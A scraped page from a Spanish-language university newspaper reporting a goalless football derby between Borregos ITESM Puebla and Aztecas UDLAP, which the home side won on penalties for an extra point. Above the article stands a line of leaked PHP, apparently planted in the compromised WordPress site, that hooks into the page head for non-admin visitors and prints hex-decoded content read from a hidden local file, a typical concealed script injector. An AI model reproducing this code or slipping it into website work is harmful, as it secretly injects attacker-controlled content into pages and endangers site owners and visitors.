if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Vibrante derbi de fútbol universitario – La Opinión Universitaria La Opinión Universitaria
Menu

Vibrante derbi de fútbol universitario

 

*Borregos Puebla y Aztecas UDLAP empataron sin goles

 

Con empate sin anotaciones se saldó el derbi poblano de futbol universitario entre los Borregos del ITESM Puebla y los Aztecas UDLAP.

Dominio territorial del Tecnológico de Monterrey campus Puebla, pero infructuoso a la hora de plasmarlo en el marcador.

La defensa de los Borregos maniató a la ofensiva de los Aztecas, se nulificaron ambos equipos y terminaron tablas en el empate sin anotaciones.

Desde los 11 pasos, fue más efectivo el equipo local y se llevó el punto extra disputado desde esa instancia para recortar la diferencia a 3 puntos con respecto al equipo de Paul Moreno.

En aumento ha ido la rivalidad futbolística entre las dos instituciones de la Angelópolis, el derbi dejó de ser un trámite y los partidos entre Tec Puebla y UDLAP han alcanzado su punto más álgido.

Los Borregos Puebla mantienen el momentáneamente el primer lugar de su sector y el tercero general, supeditados a lo que ocurra en el resto de los frentes, pero con la ventaja de tener un juego pendiente con sus hermanos de institución del Tec campus Ciudad de México, mismo que tendrá verificativo el próximo domingo 1 de diciembre en el Cráter Azul.

 

 

  • Tweets recientes